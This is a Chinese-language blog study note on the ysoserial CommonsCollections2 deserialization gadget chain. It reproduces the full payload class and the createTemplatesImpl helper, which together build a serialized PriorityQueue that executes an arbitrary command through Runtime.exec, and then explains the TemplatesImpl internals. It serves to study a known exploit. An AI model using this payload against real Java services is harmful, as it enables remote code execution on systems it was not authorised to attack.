ysoserial学习之CommonsCollections2

2021-05-01

前言

CommonCollections系列的gadgets之CommonsCollections2

实验环境:jdk1.8.0_211 、org.apache.commons:commons-collections4:4.0

关键调用链如下

at org.apache.commons.collections4.functors.InvokerTransformer.transform
	  at org.apache.commons.collections4.comparators.TransformingComparator.compare
	  at java.util.PriorityQueue.siftDownUsingComparator
	  at java.util.PriorityQueue.siftDown
	  at java.util.PriorityQueue.heapify
	  at java.util.PriorityQueue.readObject

先放ysoserial的关于CommonCollections2的exp

package ysoserial.payloads;

import java.util.PriorityQueue;
import java.util.Queue;

import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.InvokerTransformer;

import ysoserial.payloads.annotation.Authors;
import ysoserial.payloads.annotation.Dependencies;
import ysoserial.payloads.util.Gadgets;
import ysoserial.payloads.util.PayloadRunner;
import ysoserial.payloads.util.Reflections;


/*
	Gadget chain:
		ObjectInputStream.readObject()
			PriorityQueue.readObject()
				...
					TransformingComparator.compare()
						InvokerTransformer.transform()
							Method.invoke()
								Runtime.exec()
 */

@SuppressWarnings({ "rawtypes", "unchecked" })
@Dependencies({ "org.apache.commons:commons-collections4:4.0" })
@Authors({ Authors.FROHOFF })
public class CommonsCollections2 implements ObjectPayload<Queue<Object>> {

	public Queue<Object> getObject(final String command) throws Exception {
		final Object templates = Gadgets.createTemplatesImpl(command);
		// mock method name until armed
		final InvokerTransformer transformer = new InvokerTransformer("toString", new Class[0], new Object[0]);

		// create queue with numbers and basic comparator
		final PriorityQueue<Object> queue = new PriorityQueue<Object>(2,new TransformingComparator(transformer));
		// stub data for replacement later
		queue.add(1);
		queue.add(1);

		// switch method called by comparator
		Reflections.setFieldValue(transformer, "iMethodName", "newTransformer");

		// switch contents of queue
		final Object[] queueArray = (Object[]) Reflections.getFieldValue(queue, "queue");
		queueArray[0] = templates;
		queueArray[1] = 1;

		return queue;
	}

	public static void main(final String[] args) throws Exception {
		PayloadRunner.run(CommonsCollections2.class, args);
	}

}

我们只关注getObject方法中的代码

final Object templates = Gadgets.createTemplatesImpl(command);    //创建一个org.apache.xalan.xsltc.trax.TemplatesImpl方法，该方法可以通过填充其_bytecode和_name属性后调用其newTransformer方法后初始化一个_bytecode指定的任意类

Gadgets.createTemplatesImpl

public static <T> T createTemplatesImpl ( final String command, Class<T> tplClass, Class<?> abstTranslet, Class<?> transFactory )
           throws Exception {
       final T templates = tplClass.newInstance();

       // use template gadget class
       ClassPool pool = ClassPool.getDefault();
       pool.insertClassPath(new ClassClassPath(StubTransletPayload.class));
       pool.insertClassPath(new ClassClassPath(abstTranslet));
       final CtClass clazz = pool.get(StubTransletPayload.class.getName());
       // run command in static initializer
       // TODO: could also do fun things like injecting a pure-java rev/bind-shell to bypass naive protections
       String cmd = "java.lang.Runtime.getRuntime().exec(\"" +
           command.replaceAll("\\\\","\\\\\\\\").replaceAll("\"", "\\\"") +
           "\");";
       clazz.makeClassInitializer().insertAfter(cmd);
       // sortarandom name to allow repeated exploitation (watch out for PermGen exhaustion)
       clazz.setName("ysoserial.Pwner" + System.nanoTime());
       CtClass superC = pool.get(abstTranslet.getName());
       clazz.setSuperclass(superC);

       final byte[] classBytes = clazz.toBytecode();

       // inject class bytes into instance
       Reflections.setFieldValue(templates, "_bytecodes", new byte[][] {
           classBytes, ClassFiles.classAsBytes(Foo.class)
       });

       // required to make TemplatesImpl happy
       Reflections.setFieldValue(templates, "_name", "Pwnr");
       Reflections.setFieldValue(templates, "_tfactory", transFactory.newInstance());
       return templates;
   }

想要理解Gadgets.createTemplatesImpl为何要像上面这样构造就需要了解com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl.newTransformer是怎么把任意类初始化的

进入getTransletInstance()

首先校验_name是否为空，为空返回null，如果_class为空调用defineTransletClasses()

截取defineTransletClasses关键部分，可以看到调用defineClass加载_bytecodes二元字节组中的字节并将返回的class保存到_class数组中，然后校验class的父类是否为ABSTRACT_TRANSLET也就是com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet。如果是则把_class数组下标赋给_transletIndex。如果整个defineTransletClasses()运行到最终时_transletIndex<0会抛出错误。